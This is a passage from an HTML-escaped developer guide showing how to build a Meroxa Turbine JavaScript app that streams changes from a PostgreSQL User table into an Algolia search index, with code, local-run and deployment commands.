&lt;h3&gt;Entrypoint&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#entrypoint&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Within&lt;code class=&quot;language-text&quot;&gt;index.js&lt;/code&gt; we will create a data application that will listen to the&lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt; table in PostgreSQL.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; updateIndex &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;./algolia.js&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token function&quot;&gt;sendToAlgolia&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token function&quot;&gt;updateIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;postgresql&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sendToAlgolia&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_APP_ID&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_APP_ID&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_API_KEY&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_API_KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_INDEX&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_INDEX&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here is what the code does:&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;export.App&lt;/code&gt; - This is the entry point for your data application. It is responsible for identifying the upstream datastore, the upstream records, and the code to execute against the upstream records. This is the data pipeline logic (move data from here to there).&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;exports.SendToAlgolia&lt;/code&gt; - This is the function that is executed against the upstream records. It is responsible for indexing the records.&lt;/p&gt;
&lt;h3&gt;Indexing to Algolia&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#indexing-to-algolia&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The&lt;code class=&quot;language-text&quot;&gt;updateIndex&lt;/code&gt; function is responsible updating the index in Algolia.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; algoliasearch &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;algoliasearch&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; client &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;algoliasearch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;APPLICATION_ID&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;APPLICATION_KEY&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; index &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;initIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;dev_users&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;updateIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; payload &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; before&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; after&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; op &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; payload

    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;r&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;c&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;u&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;operation: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;op&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;, id: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;objectID &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id
        index
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;saveObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;then&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token function&quot;&gt;resolve&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
                console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;saved &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;catch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;err&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;error saving &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
                &lt;span class=&quot;token function&quot;&gt;reject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;d&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;operation: d, id: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        index
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;deleteObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;then&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;deleted &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
                &lt;span class=&quot;token function&quot;&gt;resolve&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;catch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;err&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;error deleting &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
                &lt;span class=&quot;token function&quot;&gt;reject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// exports&lt;/span&gt;
module&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;exports &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    updateIndex&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This method will&lt;a href=&quot;https://www.algolia.com/doc/api-reference/api-methods/save-objects/&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;saveObject&lt;/code&gt;&lt;/a&gt; if the record was created, or updated. It will&lt;a href=&quot;https://www.algolia.com/doc/api-reference/api-methods/delete-objects/&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;deleteObject&lt;/code&gt;&lt;/a&gt; if the record was deleted. This allows Algolia to stay perfectly in sync with your data infrastructure.&lt;/p&gt;
&lt;h3&gt;Secrets&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#secrets&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;You will need to update the Algolia credentials.&lt;/p&gt;
&lt;h2&gt;Running&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#running&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Next, you may run your data application locally:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app run&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Turbine uses&lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/quickstart#run-a-streaming-app-locally&quot;&gt;fixtures to simulate your data&lt;/a&gt; infrastructure locally. This allows you to test without having to worry about the infrastructure. Fixtures are JSON-formatted data records you can develop against locally. To customize the fixtures for your application, you can find them in the&lt;code class=&quot;language-text&quot;&gt;fixtures&lt;/code&gt; directory.&lt;/p&gt;
&lt;h3&gt;Verifying&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#verifying&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;You can verify the success of your data application by verifying the data in your Algolia index specified in the&lt;code class=&quot;language-text&quot;&gt;updateIndex&lt;/code&gt; function.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; client &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;algoliasearch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;APPLICATION_ID&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;APPLICATION_KEY&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; index &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;initIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;dev_users&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Deployment&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#deployment&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;After you test the behavior locally, you can deploy it to Meroxa.&lt;/p&gt;
&lt;p&gt;Meroxa is the data platform to run and execute your Turbine apps. Meroxa takes care of maintaining the connection to your database and executing your application as changes. All you need to worry about is the data application itself.&lt;/p&gt;
&lt;p&gt;Here is how you deploy:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;Add a PostgreSQL resource&lt;/a&gt; to your Meroxa environment:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create postgresql &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; postgres://&lt;span class=&quot;token variable&quot;&gt;$PG_USER&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PASS&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$PG_URL&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PORT&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$PG_DB&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Deploy to Meroxa:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, as changes are made to the upstream data infrastructure, your data application will be executed.&lt;/p&gt;
